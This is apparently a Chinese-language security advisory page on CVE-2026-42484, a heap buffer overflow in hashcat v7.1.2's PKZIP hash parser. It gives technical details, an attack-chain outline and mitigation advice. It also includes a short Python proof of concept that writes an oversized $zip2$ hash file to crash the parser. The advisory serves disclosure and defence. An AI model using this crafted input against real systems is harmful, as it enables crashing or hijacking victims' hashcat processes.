CVE-2026-42484 CVSS 9.8 严重

CVE-2026-42484 hashcat堆溢出漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42484

漏洞类型

堆缓冲区溢出

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

hashcat

漏洞概述

hashcat v7.1.2版本中的PKZIP哈希解析器存在严重的堆缓冲区溢出漏洞。该漏洞位于hex_to_binary函数中，当处理特制的PKZIP哈希文件时，由于缺乏对输入长度的有效验证，攻击者可控的十六进制数据被解码至固定大小的缓冲区。此问题影响多个哈希模式模块，攻击者无需认证即可通过网络触发该漏洞，导致程序崩溃或潜在的任意代码执行。

技术细节

该漏洞的根源在于hashcat PKZIP哈希解析模块中的hex_to_binary函数存在内存安全缺陷。具体而言，当处理特定的PKZIP哈希文件时（主要影响模块17200、17210、17220、17225及17230），若data_type_enum变量值小于或等于1，程序会进入特定的解码逻辑。在此逻辑中，系统直接将用户提供的哈希字符串中的十六进制数据转换为二进制流，并写入预先分配的固定大小缓冲区。关键问题在于，代码完全缺失了对输入十六进制字符串长度的边界检查，也未验证解码后的二进制数据大小是否超出目标缓冲区的容量。这种疏忽使得攻击者能够通过构建超长的特制哈希输入，引发基于堆的缓冲区溢出。由于hashcat常用于自动化密码破解场景，攻击者可诱导受害者加载恶意哈希文件，从而覆盖堆内存结构（如函数指针、堆元数据），最终导致应用程序崩溃（DoS）或在特定条件下劫持程序执行流，实现任意代码执行（RCE）。

攻击链分析

STEP 1

侦察

攻击者确认目标环境正在使用hashcat v7.1.2版本用于密码恢复任务。

STEP 2

武器化

攻击者编写脚本生成特制的PKZIP哈希文件，其中包含超长的十六进制字符串，旨在触发hex_to_binary函数中的缓冲区溢出。

STEP 3

传递

攻击者通过网络钓鱼、供应链攻击或直接上传等方式，将恶意哈希文件投递给目标系统。

STEP 4

利用

目标用户或自动化脚本使用hashcat加载并解析该恶意哈希文件。由于缺乏长度检查，解析器向固定缓冲区写入过量数据，覆盖堆内存。

STEP 5

执行

触发漏洞导致hashcat进程崩溃（DoS），或在特定内存布局下执行任意代码，从而控制受害主机。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-42484
# Generates a malicious PKZIP hash file to trigger heap overflow in hashcat

def generate_malicious_hash():
    # Module 17200 format example: $zip2$*0*1*0*...*$
    # The overflow happens when hex data is decoded into a fixed buffer
    
    hash_header = "$zip2$*0*1*0*"
    
    # Create a large hex string (e.g., 1000 bytes of 'A's)
    # Adjust length based on the specific buffer size in hex_to_binary
    payload_hex = "41" * 1000
    
    malicious_hash = hash_header + payload_hex + "*$"
    
    with open("exploit_hash.txt", "w") as f:
        f.write(malicious_hash)
        
    print("[+] Malicious hash file generated: exploit_hash.txt")
    print("[+] To test, run: ./hashcat -m 17200 exploit_hash.txt")
    print("[!] This should trigger a crash or unexpected behavior.")

if __name__ == "__main__":
    generate_malicious_hash()

影响范围

hashcat v7.1.2

防御指南

临时缓解措施

建议用户不要处理来源不明或不可信的PKZIP哈希文件。在未升级软件前，可限制hashcat的网络访问权限，并监控进程异常行为。开发者应在hex_to_binary函数中添加输入长度边界检查。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表